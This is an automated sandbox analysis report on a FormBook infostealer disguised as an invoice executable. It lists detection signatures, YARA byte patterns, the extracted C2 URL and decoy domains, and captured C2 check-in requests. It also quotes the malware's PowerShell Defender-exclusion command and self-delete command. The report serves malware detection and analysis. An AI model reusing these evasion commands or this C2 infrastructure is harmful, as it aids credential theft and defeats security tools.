Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
INVOICE - MV CNC BANGKOK - ST24PJ-278.exe

Overview

General Information

Sample name:INVOICE - MV CNC BANGKOK - ST24PJ-278.exe
Analysis ID:1465308
MD5:0559acbaacfcf93cefd8bcbfd498bfe4
SHA1:26142b0abd1848a4aeb96e63ed74836e5af67823
SHA256:251f9b9b5d35ad3ca96da825cea2a7b95f97872a5c6994a9123e203d41093a87
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • INVOICE - MV CNC BANGKOK - ST24PJ-278.exe (PID: 4512 cmdline: "C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exe" MD5: 0559ACBAACFCF93CEFD8BCBFD498BFE4)
    • powershell.exe (PID: 1804 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • INVOICE - MV CNC BANGKOK - ST24PJ-278.exe (PID: 3492 cmdline: "C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exe" MD5: 0559ACBAACFCF93CEFD8BCBFD498BFE4)
      • explorer.exe (PID: 4004 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • msiexec.exe (PID: 1428 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
          • cmd.exe (PID: 6268 cmdline: /c del "C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 6256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.rgrogerscreations.com/ps94/"], "decoy": ["gokorgiboard.com", "17tk558f.com", "xbtdlz.com", "agence-dyf.com", "azovtour.com", "refreshoutdoors.shop", "muyidajs.com", "bull007s.autos", "huskyacres.net", "nryijx628b.xyz", "romansotam.com", "norlac.xyz", "dorsetbusinessforum.com", "prpasti.shop", "amycostellospeech.com", "dpaijvpiajvpin.top", "rinabet371.com", "corporatebushcraft.com", "0755xx.com", "wxsjlwkj2019.com", "cjyegfoj.net", "t5u2s.xyz", "light-in-the-heavens.com", "forluvofcomedy.com", "modevow.com", "doising.com", "mpcihjpo.xyz", "readysetmarkit.com", "0909000000.com", "checkout4xgrow.shop", "whatsapp-p.vip", "vpdyt637j.xyz", "sunnykiki.net", "yesspin.vip", "mbduattf.net", "gkjjic1ti9.xyz", "coindoody.com", "st-petersburghpirates.com", "khsv4r.top", "xsmci844n.xyz", "lottiedottieclayco.com", "hregrhherdhretdhrt.xyz", "rd15.top", "parsendustriyel.com", "southernsweetsboxco.com", "swattonracing.com", "streamfly.video", "everygrow.xyz", "4iszk17p.top", "roofing-jobs-97892.bond", "625251.com", "slotgacor4dline.site", "marykellerbechem.com", "mjdwmft.life", "theip.pro", "htgithub.com", "aianswerforaluminium.com", "vtscw364x.xyz", "eroshiroutomatomekojin.com", "datanexusmarketing.com", "premierdrops.agency", "fareast-trading.com", "ddsmb.club", "transpecosexpress.com"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.4585321350.0000000010FB7000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_772cc62dunknownunknown
  • 0xa42:$a2: pass
  • 0xa48:$a3: email
  • 0xa4f:$a4: login
  • 0xa56:$a5: signin
  • 0xa67:$a6: persistent
  • 0xc3a:$r1: C:\Users\user\AppData\Roaming\J116406F\J11log.ini
00000004.00000002.2258014425.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000004.00000002.2258014425.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000004.00000002.2258014425.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      00000004.00000002.2258014425.0000000000400000.00000040.00000400.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 26 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      4.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        4.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          4.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x5451:$a1: 3C 30 50 4F 53 54 74 09 40
          • 0x1bdc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x9bcf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x14ab7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          4.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          4.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x17a49:$sqlite3step: 68 34 1C 7B E1
          • 0x17b5c:$sqlite3step: 68 34 1C 7B E1
          • 0x17a78:$sqlite3text: 68 38 2A 90 C5
          • 0x17b9d:$sqlite3text: 68 38 2A 90 C5
          • 0x17a8b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x17bb3:$sqlite3blob: 68 53 D8 7F 8C
          Click to see the 5 entries

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exe", ParentImage: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exe, ParentProcessId: 4512, ParentProcessName: INVOICE - MV CNC BANGKOK - ST24PJ-278.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exe", ProcessId: 1804, ProcessName: powershell.exe
          Sigma detected: Powershell Defender Exclusion
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exe", ParentImage: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exe, ParentProcessId: 4512, ParentProcessName: INVOICE - MV CNC BANGKOK - ST24PJ-278.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exe", ProcessId: 1804, ProcessName: powershell.exe
          Sigma detected: Non Interactive PowerShell Process Spawned
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exe", ParentImage: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exe, ParentProcessId: 4512, ParentProcessName: INVOICE - MV CNC BANGKOK - ST24PJ-278.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exe", ProcessId: 1804, ProcessName: powershell.exe

          Snort Signatures

          Timestamp:07/01/24-15:12:33.251065
          SID:2031412
          Source Port:49738
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:07/01/24-15:13:55.420752
          SID:2031412
          Source Port:49742
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:07/01/24-15:11:52.330740
          SID:2031412
          Source Port:49735
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:07/01/24-15:14:15.758040
          SID:2031412
          Source Port:49743
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:07/01/24-15:11:12.583031
          SID:2031412
          Source Port:49728
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:07/01/24-15:11:32.898165
          SID:2031412
          Source Port:49731
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus detection for URL or domain
          Source: http://www.whatsapp-p.vipAvira URL Cloud: Label: phishing
          Source: http://www.whatsapp-p.vip/ps94/Avira URL Cloud: Label: phishing
          Source: http://www.whatsapp-p.vip/ps94/www.0909000000.comAvira URL Cloud: Label: phishing
          Found malware configuration
          Source: 00000004.00000002.2258014425.0000000000400000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.rgrogerscreations.com/ps94/"], "decoy": ["gokorgiboard.com", "17tk558f.com", "xbtdlz.com", "agence-dyf.com", "azovtour.com", "refreshoutdoors.shop", "muyidajs.com", "bull007s.autos", "huskyacres.net", "nryijx628b.xyz", "romansotam.com", "norlac.xyz", "dorsetbusinessforum.com", "prpasti.shop", "amycostellospeech.com", "dpaijvpiajvpin.top", "rinabet371.com", "corporatebushcraft.com", "0755xx.com", "wxsjlwkj2019.com", "cjyegfoj.net", "t5u2s.xyz", "light-in-the-heavens.com", "forluvofcomedy.com", "modevow.com", "doising.com", "mpcihjpo.xyz", "readysetmarkit.com", "0909000000.com", "checkout4xgrow.shop", "whatsapp-p.vip", "vpdyt637j.xyz", "sunnykiki.net", "yesspin.vip", "mbduattf.net", "gkjjic1ti9.xyz", "coindoody.com", "st-petersburghpirates.com", "khsv4r.top", "xsmci844n.xyz", "lottiedottieclayco.com", "hregrhherdhretdhrt.xyz", "rd15.top", "parsendustriyel.com", "southernsweetsboxco.com", "swattonracing.com", "streamfly.video", "everygrow.xyz", "4iszk17p.top", "roofing-jobs-97892.bond", "625251.com", "slotgacor4dline.site", "marykellerbechem.com", "mjdwmft.life", "theip.pro", "htgithub.com", "aianswerforaluminium.com", "vtscw364x.xyz", "eroshiroutomatomekojin.com", "datanexusmarketing.com", "premierdrops.agency", "fareast-trading.com", "ddsmb.club", "transpecosexpress.com"]}
          Multi AV Scanner detection for submitted file
          Source: INVOICE - MV CNC BANGKOK - ST24PJ-278.exeReversingLabs: Detection: 91%
          Yara detected FormBook
          Source: Yara matchFile source: 4.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.2258014425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.4571709994.0000000004530000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.4571667584.0000000004500000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2141241119.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.4570982856.00000000005D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Machine Learning detection for sample
          Source: INVOICE - MV CNC BANGKOK - ST24PJ-278.exeJoe Sandbox ML: detected
          Source: INVOICE - MV CNC BANGKOK - ST24PJ-278.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: INVOICE - MV CNC BANGKOK - ST24PJ-278.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: msiexec.pdb source: INVOICE - MV CNC BANGKOK - ST24PJ-278.exe, 00000004.00000002.2258386431.0000000000D80000.00000040.10000000.00040000.00000000.sdmp, INVOICE - MV CNC BANGKOK - ST24PJ-278.exe, 00000004.00000002.2258639330.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, msiexec.exe, 00000007.00000002.4571358448.0000000000A20000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: msiexec.pdbGCTL source: INVOICE - MV CNC BANGKOK - ST24PJ-278.exe, 00000004.00000002.2258386431.0000000000D80000.00000040.10000000.00040000.00000000.sdmp, INVOICE - MV CNC BANGKOK - ST24PJ-278.exe, 00000004.00000002.2258639330.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.4571358448.0000000000A20000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: INVOICE - MV CNC BANGKOK - ST24PJ-278.exe, 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.4571896686.00000000046C0000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.4571896686.000000000485E000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2258620400.000000000435C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2261217913.000000000450B000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: SNCx.pdbSHA256 source: INVOICE - MV CNC BANGKOK - ST24PJ-278.exe
          Source: Binary string: wntdll.pdb source: INVOICE - MV CNC BANGKOK - ST24PJ-278.exe, INVOICE - MV CNC BANGKOK - ST24PJ-278.exe, 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, msiexec.exe, 00000007.00000002.4571896686.00000000046C0000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.4571896686.000000000485E000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2258620400.000000000435C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2261217913.000000000450B000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: SNCx.pdb source: INVOICE - MV CNC BANGKOK - ST24PJ-278.exe
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4x nop then pop ebx4_2_00407B1A
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4x nop then pop edi4_2_0040E470
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4x nop then pop edi4_2_0040E49A
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4x nop then pop edi4_2_00417DAE
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then pop edi7_2_005DE470
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then pop edi7_2_005DE49A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then pop ebx7_2_005D7B1B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then pop edi7_2_005E7DAE

          Networking

          barindex
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49728 -> 103.224.182.210:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49731 -> 44.227.76.166:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49735 -> 156.67.74.121:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49738 -> 93.127.208.60:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49742 -> 34.96.226.230:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49743 -> 43.252.160.86:80
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 103.224.182.210 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 44.227.76.166 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 156.67.74.121 80Jump to behavior
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.rgrogerscreations.com/ps94/
          Performs DNS queries to domains with low reputation
          Source: DNS query: www.xsmci844n.xyz
          Source: DNS query: www.xsmci844n.xyz
          Source: DNS query: www.xsmci844n.xyz
          Source: DNS query: www.vpdyt637j.xyz
          Source: DNS query: www.vpdyt637j.xyz
          Source: global trafficHTTP traffic detected: GET /ps94/?F8LpzZ=Ou1M3UznMYP3/z75aLq7G1bnd1hdBtxibSn4CArHC3+lhopVrt7mzXvF4mg5pwrWYjFxCbVg2Q==&XPa=ABZ4lrqh9bG4uhdP HTTP/1.1Host: www.htgithub.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ps94/?F8LpzZ=NZ9eraEhv94yON/2bUX4SSFhEhWB0QBw+0BDZem6mAjxIxJreavZH/9X5JlSDc5BrQ6sTwPTOA==&XPa=ABZ4lrqh9bG4uhdP HTTP/1.1Host: www.transpecosexpress.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ps94/?F8LpzZ=eSVNrp7QRfgmdHm4kZgp0HkMaL1TXVSZsbEIx3MHUiuygKteU4HdDiczHYPUqFCs89gbploIxQ==&XPa=ABZ4lrqh9bG4uhdP HTTP/1.1Host: www.huskyacres.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ps94/?F8LpzZ=4r6ViE8iaOvd1EXDO+38A5nQy2CJJN6ZNrbaIsLdrl8xpZaKAAcomjZYRR2tpFVDWyaQZR6wxQ==&XPa=ABZ4lrqh9bG4uhdP HTTP/1.1Host: www.light-in-the-heavens.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ps94/?F8LpzZ=Z8xr6Td5qC+h9r+P8xpcNx+5AFGRik/pzejMl2EQ43koTqqLsxs6TtkvjcUWJXi0kPax//YTLQ==&XPa=ABZ4lrqh9bG4uhdP HTTP/1.1Host: www.amycostellospeech.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 198.185.159.144 198.185.159.144
          Source: Joe Sandbox ViewIP Address: 103.224.182.210 103.224.182.210
          Source: Joe Sandbox ViewIP Address: 44.227.76.166 44.227.76.166
          Source: Joe Sandbox ViewASN Name: TESONETLT TESONETLT
          Source: Joe Sandbox ViewASN Name: TRELLIAN-AS-APTrellianPtyLimitedAU TRELLIAN-AS-APTrellianPtyLimitedAU
          Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
          Source: Joe Sandbox ViewASN Name: ASMUNDA-ASSC ASMUNDA-ASSC
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Windows\explorer.exeCode function: 6_2_10F9FF82 getaddrinfo,setsockopt,recv,6_2_10F9FF82
          Source: global trafficHTTP traffic detected: GET /ps94/?F8LpzZ=Ou1M3UznMYP3/z75aLq7G1bnd1hdBtxibSn4CArHC3+lhopVrt7mzXvF4mg5pwrWYjFxCbVg2Q==&XPa=ABZ4lrqh9bG4uhdP HTTP/1.1Host: www.htgithub.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ps94/?F8LpzZ=NZ9eraEhv94yON/2bUX4SSFhEhWB0QBw+0BDZem6mAjxIxJreavZH/9X5JlSDc5BrQ6sTwPTOA==&XPa=ABZ4lrqh9bG4uhdP HTTP/1.1Host: www.transpecosexpress.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ps94/?F8LpzZ=eSVNrp7QRfgmdHm4kZgp0HkMaL1TXVSZsbEIx3MHUiuygKteU4HdDiczHYPUqFCs89gbploIxQ==&XPa=ABZ4lrqh9bG4uhdP HTTP/1.1Host: www.huskyacres.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ps94/?F8LpzZ=4r6ViE8iaOvd1EXDO+38A5nQy2CJJN6ZNrbaIsLdrl8xpZaKAAcomjZYRR2tpFVDWyaQZR6wxQ==&XPa=ABZ4lrqh9bG4uhdP HTTP/1.1Host: www.light-in-the-heavens.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ps94/?F8LpzZ=Z8xr6Td5qC+h9r+P8xpcNx+5AFGRik/pzejMl2EQ43koTqqLsxs6TtkvjcUWJXi0kPax//YTLQ==&XPa=ABZ4lrqh9bG4uhdP HTTP/1.1Host: www.amycostellospeech.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficDNS traffic detected: DNS query: www.htgithub.com
          Source: global trafficDNS traffic detected: DNS query: www.transpecosexpress.com
          Source: global trafficDNS traffic detected: DNS query: www.huskyacres.net
          Source: global trafficDNS traffic detected: DNS query: www.rgrogerscreations.com
